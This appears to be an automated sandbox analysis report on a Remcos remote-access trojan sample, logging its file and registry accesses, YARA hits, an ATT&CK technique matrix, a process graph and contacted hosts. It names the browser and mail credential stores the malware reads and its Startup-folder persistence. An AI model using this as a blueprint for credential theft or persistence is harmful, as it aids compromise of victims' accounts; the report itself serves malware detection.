                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_10002264
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0041A7A2 GetComputerNameExW,GetUserNameW,11_2_0041A7A2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00448057
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.4123803181.0000000000466000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4126585054.000000000307F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003BC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.000000000151A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7652, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: .exe PID: 7292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: ESMTPPassword16_2_004033F0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword16_2_00402DB3
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword16_2_00402DB3
                  Source: Yara matchFile source: Process Memory Space: .exe PID: 4888, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R1T905Jump to behavior
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3af7610.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.FAT6789098700900.scr.exe.900000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.FAT6789098700900.scr.exe.3b6fa40.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.4123803181.0000000000466000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4126585054.000000000307F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003BC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.000000000151A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.4125168442.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: FAT6789098700900.scr.exe PID: 7652, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: .exe PID: 7292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services12
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  11
                  Deobfuscate/Decode Files or Information
                  211
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  2
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  12
                  Registry Run Keys / Startup Folder
                  1
                  Windows Service
                  41
                  Obfuscated Files or Information
                  2
                  Credentials in Registry
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  1
                  Remote Access Software
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  PowerShell
                  Login Hook212
                  Process Injection
                  12
                  Software Packing
                  1
                  Credentials In Files
                  2
                  File and Directory Discovery
                  Distributed Component Object Model211
                  Input Capture
                  2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                  Registry Run Keys / Startup Folder
                  1
                  Timestomp
                  LSA Secrets48
                  System Information Discovery
                  SSH3
                  Clipboard Data
                  12
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials161
                  Security Software Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                  Masquerading
                  DCSync51
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
                  Virtualization/Sandbox Evasion
                  Proc Filesystem4
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                  Process Injection
                  Network Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567061 Sample: FAT6789098700900.scr.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 52 geoplugin.net 2->52 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 18 other signatures 2->74 8 .exe 2 2->8         started        10 FAT6789098700900.scr.exe 2 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 16 .exe 3 16 8->16         started        21 powershell.exe 11 8->21         started        76 Bypasses PowerShell execution policy 10->76 23 powershell.exe 13 10->23         started        25 FAT6789098700900.scr.exe 10->25         started        54 127.0.0.1 unknown unknown 13->54 signatures6 process7 dnsIp8 48 192.210.150.26, 49742, 49744, 8787 AS-COLOCROSSINGUS United States 16->48 50 geoplugin.net 178.237.33.50, 49745, 80 ATOM86-ASATOM86NL Netherlands 16->50 42 C:\ProgramData\remcos\logs.dat, data 16->42 dropped 56 Detected Remcos RAT 16->56 58 Maps a DLL or memory area into another process 16->58 60 Installs a global keyboard hook 16->60 27 .exe 16->27         started        30 .exe 16->30         started        32 .exe 16->32         started        40 2 other processes 16->40 34 conhost.exe 21->34         started        44 C:\Users\user\AppData\Roaming\...\.exe, PE32 23->44 dropped 46 C:\Users\user\...\.exe:Zone.Identifier, ASCII 23->46 dropped 62 Creates executable files without a name 23->62 64 Drops PE files to the startup folder 23->64 66 Powershell drops PE file 23->66 36 conhost.exe 23->36         started        38 WerFault.exe 21 16 25->38         started        file9 signatures10 process11 signatures12 78 Tries to steal Instant Messenger accounts or passwords 27->78 80 Tries to steal Mail credentials (via file / registry access) 27->80 82 Tries to harvest and steal browser information (history, passwords, etc) 30->82

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  FAT6789098700900.scr.exe53%ReversingLabsWin32.Trojan.Remcos
                  FAT6789098700900.scr.exe33%VirustotalBrowse
                  FAT6789098700900.scr.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe53%ReversingLabsWin32.Trojan.Remcos
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe63%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://schemas.asp.net/2015/03/dataProtection0%Avira URL Cloudsafe
                  http://schemas.asp.net/2015/03/dataProtection0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  geoplugin.net
                  178.237.33.50
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.imvu.comr.exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        high
                        https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhvA1B.tmp.13.drfalse
                          high
                          https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhvA1B.tmp.13.drfalse
                            high
                            https://g.live.com/odclientsettings/ProdV2.C:edb.log.5.drfalse
                              high
                              http://www.fontbureau.com/designersFAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.nirsoft.net.exe, 0000000D.00000002.1860840843.0000000000D53000.00000004.00000010.00020000.00000000.sdmpfalse
                                  high
                                  https://aefd.nelreports.net/api/report?cat=bingaotakbhvA1B.tmp.13.drfalse
                                    high
                                    https://deff.nelreports.net/api/report?cat=msnbhvA1B.tmp.13.drfalse
                                      high
                                      https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhvA1B.tmp.13.drfalse
                                        high
                                        https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&FrbhvA1B.tmp.13.drfalse
                                          high
                                          https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhvA1B.tmp.13.drfalse
                                            high
                                            http://www.sajatypeworks.comFAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://g.live.com/odclientsettings/Prod.C:edb.log.5.drfalse
                                                high
                                                https://www.google.com.exe, .exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/cTheFAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhvA1B.tmp.13.drfalse
                                                      high
                                                      http://geoplugin.net/json.gp/CFAT6789098700900.scr.exe, 00000000.00000002.4129439610.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, FAT6789098700900.scr.exe, 00000000.00000002.4129439610.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, FAT6789098700900.scr.exe, 00000003.00000002.1914432587.0000000000957000.00000002.00000400.00020000.00000000.sdmp, .exe, 00000008.00000002.4129081152.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, .exe, 0000000B.00000002.4123803181.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        high
                                                        https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1672388418.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1811441059.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://maps.windows.com/windows-app-web-linkbhvA1B.tmp.13.drfalse
                                                            high
                                                            http://aka.ms/dataprotectionwarningFAT6789098700900.scr.exe, .exe.1.drfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1693445037.00000000060CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1822124849.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/DPleaseFAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhvA1B.tmp.13.drfalse
                                                                    high
                                                                    http://www.urwpp.deDPleaseFAT6789098700900.scr.exe, 00000000.00000002.4140609938.0000000006DB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.nirsoft.net/.exe, 00000011.00000002.1851779290.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        high
